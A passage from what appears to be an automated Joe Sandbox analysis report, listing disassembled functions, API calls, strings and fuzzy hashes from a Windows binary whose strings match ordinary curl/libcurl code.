                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E03BA6
                                    • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00E03BAE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func$_errnoferrorfreadstrerror
                                    • String ID: 0kv@qv@/lv$stdin: %s
                                    • API String ID: 2463866935-3803571333
                                    • Opcode ID: f354f8f66b01d11af7213729fda5f8baa3dc215fab2715c06007ca067f0484f7
                                    • Instruction ID: 92a6f1045a2a277c90c787fd4d27ef1c742c9c4ea43827d70443e87cb2821cd5
                                    • Opcode Fuzzy Hash: f354f8f66b01d11af7213729fda5f8baa3dc215fab2715c06007ca067f0484f7
                                    • Instruction Fuzzy Hash: E321AD32600B419FCB208F3ADC84866B7FDFB4476A754282EE946A2991D770EE848E54
                                    Function 00E1A1A0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A1AB
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1B3
                                      • Part of subcall function 00E1A01F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 00E1A058
                                      • Part of subcall function 00E1A01F: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?), ref: 00E1A06F
                                      • Part of subcall function 00E1A01F: ___from_strstr_to_strchr.LIBCMT ref: 00E1A087
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1E9
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1F6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A1FE
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A209
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast_errno$FormatMessage___from_strstr_to_strchrwcstombs
                                    • String ID: 0kv@qv@/lv$Unknown error %u (0x%08X)
                                    • API String ID: 1622130791-1991110101
                                    • Opcode ID: 1fbcf7b5a131de120224755548e1671a31702ce761f12215c8b24229f88e28ba
                                    • Instruction ID: da9b2b3d3a38330abcecff10b41cc245e78b40eb0f99ba06f04ba07ac5423331
                                    • Opcode Fuzzy Hash: 1fbcf7b5a131de120224755548e1671a31702ce761f12215c8b24229f88e28ba
                                    • Instruction Fuzzy Hash: 6CF0F472301F00BFC3152B7A9C08AAEBBE8DF89752F141865F101F7260EAF09C40CA61
                                    Function 00E02A46 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 38COMMON
                                    Download Yara Rule
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,00E02BF3), ref: 00E02A4D
                                    Strings
                                    • %s resides on a read-only file system., xrefs: 00E02A86
                                    • The directory name %s is too long., xrefs: 00E02A7F
                                    • 0kv@qv@/lv, xrefs: 00E02A4D
                                    • No space left on the file system that will contain the directory %s., xrefs: 00E02A8D, 00E02A9A
                                    • Cannot create directory %s because you exceeded your quota., xrefs: 00E02A78
                                    • You don't have permission to create %s., xrefs: 00E02A94
                                    • Error creating directory %s., xrefs: 00E02A71
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: %s resides on a read-only file system.$0kv@qv@/lv$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
                                    • API String ID: 2918714741-4254254042
                                    • Opcode ID: f379f3081695983589889a9a565699e643bc8064f1d788f675eb7501a5b2fbf5
                                    • Instruction ID: 97e500398a1ba414e61b43ec95816cca431abbc921bb2b380e9314717d4df50f
                                    • Opcode Fuzzy Hash: f379f3081695983589889a9a565699e643bc8064f1d788f675eb7501a5b2fbf5
                                    • Instruction Fuzzy Hash: E6F082A6308003A6C63845BF790D4B316F4D7C13577143B2FBA45F6AB4DC04CCA96212
                                    Function 00E40D2B Relevance: 13.7, APIs: 5, Strings: 4, Instructions: 222COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E30B5D,?,?,00000001), ref: 00E40E63
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,00E30B5D,?,?,00000001), ref: 00E40ECE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,00E30B5D,?,?,00000001), ref: 00E40F09
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?,?,00E30B5D,?,?,00000001), ref: 00E40F86
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,00E30B5D,?,?,00000001), ref: 00E40FC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-$y
                                    • API String ID: 1294909896-246124813
                                    • Opcode ID: adb0b6410d72439efebbe140db6112ec5f9ab5f26b97bec1dcfe5fddf4bb748a
                                    • Instruction ID: c12b03fe8875b2d8f0e38b659494bad53bdc47763637e11b481591f634f3d804
                                    • Opcode Fuzzy Hash: adb0b6410d72439efebbe140db6112ec5f9ab5f26b97bec1dcfe5fddf4bb748a
                                    • Instruction Fuzzy Hash: BE912A75A0420AAFDB14DFA8E880AADBBF5EF48314F10507AE905F7351DB71AD45CB90
                                    Function 00E0F352 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 203COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 00E0F58A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$blobpointer$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
                                    • API String ID: 1294909896-2831394677
                                    • Opcode ID: 1933dc4ecc1aba039cfbd028b53101a3b109a6361406b958722d7525ad2a6f0a
                                    • Instruction ID: 123710e540b7a332dd6af7fc79c071c6b018657b0375ec39ea0b2f116768ac9a
                                    • Opcode Fuzzy Hash: 1933dc4ecc1aba039cfbd028b53101a3b109a6361406b958722d7525ad2a6f0a
                                    • Instruction Fuzzy Hash: 456144726083409BCB21DE249C419EF7BE1AF89394F186978F889B76C1D234DCA4C792
                                    Function 00E34EF7 Relevance: 13.6, APIs: 9, Instructions: 121COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,HTTP,?,?), ref: 00E34F12
                                    • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000005C,?,?,00000000,HTTP,?,?), ref: 00E34F25
                                    • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000002F), ref: 00E34F34
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E34F9C
                                    • _mbsnbcpy.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,?,?), ref: 00E34FAC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E34FC0
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E34FC9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35000
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35013
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_mbschr_strdup$_mbsnbcpymalloc
                                    • String ID:
                                    • API String ID: 103568399-0
                                    • Opcode ID: 61f439b29b6d6a859272ab3028dd450d200351ef6f135ee43d49eda3907ebf1a
                                    • Instruction ID: d80ef73b676046a0f0ab3e83583a8530eba877b419f2c3eb8d108895f50e462d
                                    • Opcode Fuzzy Hash: 61f439b29b6d6a859272ab3028dd450d200351ef6f135ee43d49eda3907ebf1a
                                    • Instruction Fuzzy Hash: 23310437A04A029FCB095F69EC185AE7FF5EF84311F248069E405FB2A1DF71C9048B90
                                    Function 00E1E820 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 384COMMON
                                    Download Yara Rule
                                    Strings
                                    • Failed to connect to %s port %u after %I64d ms: %s, xrefs: 00E1ED2B
                                    • After %I64dms connect time, move on!, xrefs: 00E1E98C
                                    • Connection timeout after %ld ms, xrefs: 00E1EC51
                                    • L', xrefs: 00E1E99A
                                    • connect to %s port %u failed: %s, xrefs: 00E1EAB2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: After %I64dms connect time, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s$L'$connect to %s port %u failed: %s
                                    • API String ID: 0-861291074
                                    • Opcode ID: f6fc05a959aac38670c7ca984261dd6c4eb155875e91c896fffac77e040b58ec
                                    • Instruction ID: 7aa2d6c1cecafdcd726fb93a78606de6618155f4710a85bd23516bd9c96e4430
                                    • Opcode Fuzzy Hash: f6fc05a959aac38670c7ca984261dd6c4eb155875e91c896fffac77e040b58ec
                                    • Instruction Fuzzy Hash: 3EE1C0319006549BDF25DE288C89BEAB7B6AF85314F1411E9FC09BF391DA719EC18B81
                                    Function 00E404E4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E40503
                                    • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00E405B7
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E405C6
                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 00E40673
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E406EE
                                    Strings
                                    • Can't get the size of %s, xrefs: 00E405CE
                                    • Can't open %s for writing, xrefs: 00E40565
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _close$___from_strstr_to_strchr_fstat64_write
                                    • String ID: Can't get the size of %s$Can't open %s for writing
                                    • API String ID: 2085843339-3544860555
                                    • Opcode ID: f6619021a36289c746357279afc40518415bb838826f23c7fbf90103355cc859
                                    • Instruction ID: 2eef012eeeb5e86bb4c7989d505618e20b75486f50937bc760b28da7c98a7554
                                    • Opcode Fuzzy Hash: f6619021a36289c746357279afc40518415bb838826f23c7fbf90103355cc859
                                    • Instruction Fuzzy Hash: A7619371A002048BDF28DFA8E895A9D77F5FF88314F292179ED0AFB245EA705C458B50
                                    Function 00E51E40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 170COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00E51E77
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E51E7F
                                    • _ValidateLocalCookies.LIBCMT ref: 00E51F08
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E51F33
                                    • _ValidateLocalCookies.LIBCMT ref: 00E51F88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm$csm
                                    • API String ID: 1170836740-3733052814
                                    • Opcode ID: 631750e28dbb3afb12ad52e25af8281ae02d3f137351ec64d881348e8f9536b9
                                    • Instruction ID: 8928289b502390662bea548afb79113de0f587cda254c8c5a2434a6cb11a1d95
                                    • Opcode Fuzzy Hash: 631750e28dbb3afb12ad52e25af8281ae02d3f137351ec64d881348e8f9536b9
                                    • Instruction Fuzzy Hash: 0651E034A012049FCF14DF28C840BAEBBA1BF4535AF1498ADED157B2A2C731DD49CBA0
                                    Function 00E26510 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142COMMON
                                    Download Yara Rule
                                    Strings
                                    • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00E265B9
                                    • %s.%s.tmp, xrefs: 00E26583
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%s.%s.tmp
                                    • API String ID: 0-2507297550
                                    • Opcode ID: 9ff4f924a096adc9b9757767edebd6d0021fc395e5b82540cf96a852bf02cefd
                                    • Instruction ID: e47193641dc81914c67fb84b4fc1b17a0d965cfe69f6483dd2d19c2528721cc5
                                    • Opcode Fuzzy Hash: 9ff4f924a096adc9b9757767edebd6d0021fc395e5b82540cf96a852bf02cefd
                                    • Instruction Fuzzy Hash: AA41A072E407259FDF118F54F841AAEB7B5EF48764F24165AEC01BB285DB70AC058BA0
                                    Function 00E03460 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 00E0347F
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E56C58), ref: 00E0348D
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E035C2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_funcfclosefopen
                                    • String ID: %s$%s$Failed to open %s to write libcurl code!$pv
                                    • API String ID: 4110152555-95071132
                                    • Opcode ID: 9a371892d2290bd305b9c792f629fdc110c07a27a34b7a864224f1b58f9987a9
                                    • Instruction ID: 7a7a137f816becdec6a3201db73f161dda583749bd4f2c30d26ecab294a5af1d
                                    • Opcode Fuzzy Hash: 9a371892d2290bd305b9c792f629fdc110c07a27a34b7a864224f1b58f9987a9
                                    • Instruction Fuzzy Hash: CC412971209A01AFC7129B39BC02B96736E9F81319B242019F95477291D770EFA9C694
                                    Function 00E2136B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E213E6
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2142F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E2149A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E214DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr
                                    • String ID: %.*s$%sAuthorization: Digest %s$Proxy-
                                    • API String ID: 622630536-541442569
                                    • Opcode ID: 66d7c1d368f97d316863b0c10c839fc4cf34c764652e8d1427047481fbb8959e
                                    • Instruction ID: bb5b9848e90153fcd8988818617894609b724edafbf622eed2f914942e3fbd1e
                                    • Opcode Fuzzy Hash: 66d7c1d368f97d316863b0c10c839fc4cf34c764652e8d1427047481fbb8959e
                                    • Instruction Fuzzy Hash: 96417371A0422A9FDB04DFA9E840AAEBBF5EF58354F10506AE815F7351D7709E04CBA1
                                    Function 00E0500A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 128stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00E58C2C), ref: 00E0505C
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E05070
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,00E58C2C), ref: 00E05097
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,00E58C2C), ref: 00E050A2
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E0512B
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E0513C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdup$mallocstrcspnstrncpystrpbrk
                                    • String ID: pkcs11:
                                    • API String ID: 1722728043-2446828420
                                    • Opcode ID: 6b0a73065cd799ab15017a146c51b2555f0f4bcce75d8e5e0dc6123dcbbf24d6
                                    • Instruction ID: 50a70a10977c9e1be45fecac139494108b0ad749a863366e8068250197406516
                                    • Opcode Fuzzy Hash: 6b0a73065cd799ab15017a146c51b2555f0f4bcce75d8e5e0dc6123dcbbf24d6
                                    • Instruction Fuzzy Hash: A5412A32205B819FDB264B28D8A07BB7FE59F57358F282099D485BB3C5D6A14C81CF61
                                    Function 00E3F42A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • htons.WS2_32(?), ref: 00E3F47D
                                    • htons.WS2_32(?), ref: 00E3F491
                                    • send.WS2_32(?,?,00000003,00000000), ref: 00E3F51A
                                    • WSAGetLastError.WS2_32(?,00000001), ref: 00E3F524
                                    • send.WS2_32(?,?,00000002,00000000), ref: 00E3F55A
                                    • WSAGetLastError.WS2_32(?,00000001), ref: 00E3F564
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLasthtonssend
                                    • String ID: Sending data failed (%d)
                                    • API String ID: 2027122571-2319402659
                                    • Opcode ID: 0c01ef20178b61fe90f0416dda3d871178ab0256baf8b1433a98d9d157bf9171
                                    • Instruction ID: 279a3031d77d072ab3ccba9c5ff43482380ff2ac495d201bcff87dddfe12e275
                                    • Opcode Fuzzy Hash: 0c01ef20178b61fe90f0416dda3d871178ab0256baf8b1433a98d9d157bf9171
                                    • Instruction Fuzzy Hash: 3F41E971648250DFD7169F28C899DAA7BE4FF25721F240AB9F9D2DB292D7309C04CB60
                                    Function 00E15117 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 120stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E03857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00E03872
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E15198
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A,?,00000000,00000000,?,?,?,?,?,?,00E15B5D,00000000), ref: 00E151D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr__stdio_common_vsscanfstrtol
                                    • String ID: %*[^]]%c%n$%ld$[%*45[0123456789abcdefABCDEF:.]%c%n$]$][
                                    • API String ID: 1045171823-2251480945
                                    • Opcode ID: 231a661ef6e77f412bc1c088383c90610aa4d1cc6c2a656026c424ffa54db5e6
                                    • Instruction ID: f4ac5407a5cefc6a677251889934952c9d9c72dde62ab352ea73134c339f6c39
                                    • Opcode Fuzzy Hash: 231a661ef6e77f412bc1c088383c90610aa4d1cc6c2a656026c424ffa54db5e6
                                    • Instruction Fuzzy Hash: 7D315733F01A05FEDB329B689C02BFE77AC9F85304F14259AE841F7181D2709DC482A1
                                    Function 00E3B26F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strrchr.LIBCMT ref: 00E3B2B9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E3B2E3
